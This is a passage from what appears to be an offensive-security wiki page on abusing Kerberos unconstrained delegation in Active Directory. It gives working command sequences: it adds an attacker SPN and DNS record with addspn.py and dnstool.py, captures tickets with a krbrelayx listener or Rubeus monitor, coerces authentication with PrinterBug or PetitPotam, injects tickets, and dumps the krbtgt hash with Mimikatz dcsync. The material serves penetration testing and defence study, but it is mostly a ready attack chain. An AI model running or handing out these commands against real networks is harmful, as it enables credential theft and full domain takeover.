(KUD) Unconstrained

Theory

If an account (user or computer), with unconstrained delegations privileges, is compromised, an attacker must wait for a privileged user to authenticate on it (or force it) using Kerberos. The attacker service will receive an ST (service ticket) containing the user's TGT. That TGT will be used by the service as a proof of identity to obtain access to a target service as the target user.
Unconstrained delegation abuses are usually combined with the PrinterBug or PrivExchange to gain domain admin privileges.

Practice

From the attacker machine (UNIX-like)
From the compromised computer (Windows)
In order to abuse the unconstrained delegations privileges of an account, an attacker must add his machine to its SPNs (i.e. of the compromised account) and add a DNS entry for that name.
This allows targets (e.g. Domain Controllers or Exchange servers) to authenticate back to the attacker machine.
All of this can be done from UNIX-like systems with addspn, dnstool and krbrelayx (Python).
When attacking accounts able to delegate without constraints, there are two major scenarios
  • the account is a computer: computers can edit their own SPNs via the msDS-AdditionalDnsHostName attribute. Since ticket received by krbrelayx will be encrypted with AES256 (by default), attackers will need to either supply the right AES256 key for the unconstrained delegations account (--aesKey argument) or the salt and password (--krbsalt and --krbpass arguments).
  • the account is a user: users can't edit their own SPNs like computers do. Attackers need to control an account operator (or any other user that has the needed privileges) to edit the user's SPNs. Moreover, since tickets received by krbrelayx will be encrypted with RC4, attackers will need to either supply the NT hash (-hashes argument) or the salt and password (--krbsalt and --krbpass arguments)
By default, the salt is always
  • For users: uppercase FQDN + case sensitive username = DOMAIN.LOCALuser
  • For computers: uppercase FQDN + host + lowercase FQDN hostname without the trailing $ = DOMAIN.LOCALhostcomputer.domain.local
1
# 1. Edit the compromised account's SPN via the msDS-AdditionalDnsHostName property (HOST for incoming SMB with PrinterBug, HTTP for incoming HTTP with PrivExchange)
2
addspn.py -u 'DOMAIN\CompromisedAccont' -p 'LMhash:NThash' -s 'HOST/attacker.DOMAIN_FQDN' --additional 'DomainController'
3
โ€‹
4
# 2. Add a DNS entry for the attacker name set in the SPN added in the target machine account's SPNs
5
dnstool.py -u 'DOMAIN\CompromisedAccont' -p 'LMhash:NThash' -r 'attacker.DOMAIN_FQDN' -d 'attacker_IP' --action add 'DomainController'
6
โ€‹
7
# 3. Start the krbrelayx listener (the AES key is used by default by computer accounts to decrypt tickets)
8
krbrelayx.py --krbsalt 'DOMAINusername' --krbpass 'password'
9
โ€‹
10
# 4. Authentication coercion
11
# PrinterBug, PetitPotam, PrivExchange, ...
Copied!
In case, for some reason, attacking a Domain Controller doesn't work (i.e. error sayingCiphertext integrity failed.) try to attack others (if you're certain the credentials you supplied were correct). Some replication and propagation issues could get in the way.
Once the krbrelayx listener is ready, an authentication coercion attack (e.g. PrinterBug, PrivExchange, PetitPotam) can be operated. The listener will then receive a Kerberos authentication, hence a ST, containing a TGT.
Once the KUD capable host is compromised, Rubeus can be used (on the compromised host) as a listener to wait for a user to authenticate, the ST to show up and to extract the TGT it contains.
1
Rubeus.exe monitor /interval:5
Copied!
Once the monitor is ready, a forced authentication attack (e.g. PrinterBug, PrivExchange) can be operated. Rubeus will then receive an authentication (hence a ST, containing a TGT). The TGT can be used to request a ST for another service.
1
Rubeus.exe asktgs /ticket:$base64_extracted_TGT /service:$target_SPN /ptt
Copied!
Once the ticket is injected, it can natively be used when accessing a service, for example with Mimikatz to extract the krbtgt hash.
1
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
Copied!

Resources

Unconstrained Delegation Permissions
Stealthbits Technologies
Abusing Users Configured with Unconstrained Delegation
eXploit
โ€œRelayingโ€ Kerberos - Having fun with unconstrained delegation
dirkjanm.io
โ€‹
Last modified 1mo ago
Copy link